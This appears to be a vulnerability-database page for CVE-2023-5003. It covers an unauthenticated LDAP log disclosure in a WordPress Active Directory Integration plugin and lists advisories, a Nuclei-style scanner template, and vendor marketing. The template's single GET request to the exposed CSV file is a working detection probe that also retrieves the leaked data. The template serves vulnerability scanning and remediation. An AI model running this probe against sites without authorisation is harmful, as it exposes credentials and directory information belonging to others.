| Reporter | Title | Published | Views | Family All 15 |
|---|---|---|---|---|
| CVE-2023-5003 | 17 Oct 202300:38 | – | circl | |
| WordPress plugin Active Directory Integration / LDAP Integration security vulnerability | 16 Oct 202300:00 | – | cnnvd | |
| CVE-2023-5003 | 16 Oct 202319:39 | – | cve | |
| CVE-2023-5003 Active Directory Integration < 4.1.10 - Unauthenticated Log Disclosure | 16 Oct 202319:39 | – | cvelist | |
| CVE-2023-5003 | 16 Oct 202320:15 | – | nvd | |
| owasp-modsecurity-crs-4.10.0-1.1 on GA media (moderate) | 31 Jan 202500:00 | – | opensuse | |
| CVE-2023-5003 | 16 Oct 202320:15 | – | osv | |
| OPENSUSE-SU-2025:14717-1 owasp-modsecurity-crs-4.10.0-1.1 on GA media | 30 Jan 202500:00 | – | osv | |
| WordPress Active Directory Integration / LDAP Integration Plugin < 4.1.10 is vulnerable to Sensitive Data Exposure | 17 Oct 202300:00 | – | patchstack | |
| Design/Logic Flaw | 16 Oct 202320:15 | – | prion |
id: CVE-2023-5003
info:
name: Active Directory Integration WP Plugin < 4.1.10 - Log Disclosure
author: s4e-io
severity: high
description: |
The Active Directory Integration / LDAP Integration WordPress plugin before 4.1.10 stores sensitive LDAP logs in a buffer file when an administrator wants to export said logs. Unfortunately, this log file is never removed, and remains accessible to any users knowing the URL to do so.
impact: |
Unauthenticated attackers can access sensitive LDAP logs containing authentication credentials and directory information by directly accessing the buffer file URL.
remediation: Fixed in 4.1.10
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2023-5003
- https://wpscan.com/vulnerability/91f4e500-71f3-4ef6-9cc7-24a7c12a5748/
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2023-5003
epss-score: 0.25855
epss-percentile: 0.97719
cpe: cpe:2.3:a:miniorange:active_directory_integration_\/_ldap_integration:*:*:*:*:*:wordpress:*:*
metadata:
verified: true
max-request: 1
vendor: miniorange
product: active_directory_integration_\/_ldap_integration
framework: wordpress
tags: wpscan,exposure,csv,ldap,wordpress,wp-plugin,cve,cve2023,miniorange,vuln
http:
- method: GET
path:
- "{{BaseURL}}/wp-content/ldap-authentication-report.csv"
matchers-condition: and
matchers:
- type: word
words:
- "ID"
- "USERNAME"
- "TIME"
- "LDAP STATUS"
condition: and
- type: status
status:
- 200
# digest: 4a0a00473045022058cbb3fe536659929ff6791a8b20acbdf39eb8d31a4a2af258cbc8789b12553e022100f78fcec0886617b3a0a7228b153ebdcf683ab8cc629b5094e6dee058bc617413:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation